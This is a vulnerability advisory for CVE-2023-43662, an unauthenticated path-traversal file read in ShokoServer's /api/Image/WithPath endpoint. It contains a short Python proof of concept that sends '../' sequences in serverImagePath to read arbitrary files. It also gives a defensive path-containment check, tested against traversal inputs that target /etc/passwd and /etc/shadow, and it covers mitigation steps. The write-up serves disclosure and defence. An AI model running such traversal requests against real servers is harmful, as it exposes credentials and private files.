CVE-2023-43662 is a critical vulnerability found in ShokoServer, a widely used media server that specializes in organizing anime. The flaw lets unauthenticated attackers read arbitrary files stored on the server, potentially exposing sensitive information. The issue lies in the /api/Image/WithPath endpoint, which is reachable without authentication and is intended to return the server's default images. Because the endpoint performs no input sanitization, it can be abused for unintended purposes.

Description and Exploit Details

Attackers can exploit this vulnerability by manipulating the serverImagePath parameter, which is passed to System.IO.File.OpenRead without sanitization. As a result, a crafted request can read arbitrary files from the server. The problem is worse on installations that used the Windows installer, because it runs ShokoServer with administrative privileges, so the process can read files that an unprivileged account could not.

Here's an example of how the vulnerability may be exploited:

import requests

# Replace [target_ip] with the IP address of the target server
url = "http://[target_ip]/api/Image/WithPath"

# Replace [file_path] with the desired file path; the leading ../ segments
# walk out of the images directory because the parameter is not sanitized
params = {
    "serverImagePath": "../../../../../../[file_path]"
}

# No authentication is required for this endpoint
response = requests.get(url, params=params)
print(response.text)
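For contrast, the following is an added example (not code from the page or from the ShokoServer project) showing the check that the vulnerable endpoint lacked: a request path is only ever resolved relative to a fixed image directory, and the normalized result is rejected unless it still lies inside that directory. The image root path, the function names and the error type are assumptions for the example; ShokoServer's real directory layout is not on this page. The check is written with posixpath so it behaves the same on every host, and it treats backslashes as separators because the Windows case is explicitly affected.

```python
import posixpath

# Assumed image directory for the example (hypothetical; not ShokoServer's real layout).
IMAGE_ROOT = "/var/lib/shoko/images"


class PathTraversalError(ValueError):
    """Raised when a user-supplied path would escape the image directory."""


def resolve_server_image_path(requested: str, root: str = IMAGE_ROOT) -> str:
    """Map an untrusted serverImagePath value onto a file under root.

    Rejects empty values, NUL bytes, absolute and drive-qualified paths, and
    any value whose normalized form leaves root. This is the containment check
    that a File.OpenRead on raw user input skips.
    """
    if not requested or "\x00" in requested:
        raise PathTraversalError("empty or NUL-containing path")

    # Treat backslashes as separators too: on Windows hosts "..\\" escapes just as "../" does.
    candidate = requested.replace("\\", "/")

    if candidate.startswith("/") or (len(candidate) > 1 and candidate[1] == ":"):
        raise PathTraversalError("absolute paths are not allowed")

    # Join under the root, collapse "." and ".." lexically, then confirm the
    # result still shares the root as a common prefix (a string prefix test
    # alone would wrongly accept "/var/lib/shoko/images-old/x").
    root_norm = posixpath.normpath(root)
    full = posixpath.normpath(posixpath.join(root_norm, candidate))
    if posixpath.commonpath([root_norm, full]) != root_norm:
        raise PathTraversalError(f"path escapes image root: {requested!r}")
    return full


def is_safe_image_path(requested: str, root: str = IMAGE_ROOT) -> bool:
    """Boolean convenience wrapper around resolve_server_image_path."""
    try:
        resolve_server_image_path(requested, root)
        return True
    except PathTraversalError:
        return False


if __name__ == "__main__":
    # Constructed sample inputs: one legitimate name, then traversal variants.
    for value in ["posters/default.png", "../../../../etc/passwd",
                  "..\\..\\windows\\win.ini", "/etc/shadow", "C:/Windows/win.ini"]:
        print(f"{value!r:32} -> {'ok' if is_safe_image_path(value) else 'REJECTED'}")
```

The lexical check is deliberately done before any filesystem access so that the decision never depends on what exists on disk. If the image directory can contain symlinks, a deployment should additionally resolve the final path with os.path.realpath after opening and repeat the same containment test on the resolved path.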

Impact

This vulnerability allows unauthenticated attackers to access and read sensitive information stored on the server. Depending on the data exposed, this could have serious implications for users, such as identity theft or unauthorized server control.

Mitigation and Fixes

The ShokoServer team has been notified of the vulnerability and removed the /api/Image/WithPath endpoint in a recent commit (6c57baf), which will be included in future releases. Users should either limit access to the vulnerable endpoint or manually patch their installations until a fixed release is available.

- ShokoServer GitHub Repository: https://github.com/ShokoAnime/ShokoServer
- Commit 6c57baf: https://github.com/ShokoAnime/ShokoServer/commit/6c57baf
- GitHub Security Lab Advisory: https://securitylab.github.com/advisories/GHSL-2023-191-shokoanime-ShokoServer

We would like to acknowledge the GitHub Security Lab for discovering this issue and the ShokoServer team for their prompt response to the vulnerability. It is essential for developers and users to stay informed and take the necessary steps to ensure their software is up-to-date and secure.

Timeline

Published on: 09/28/2023 22:15:00 UTC
Last modified on: 10/06/2023 18:28:00 UTC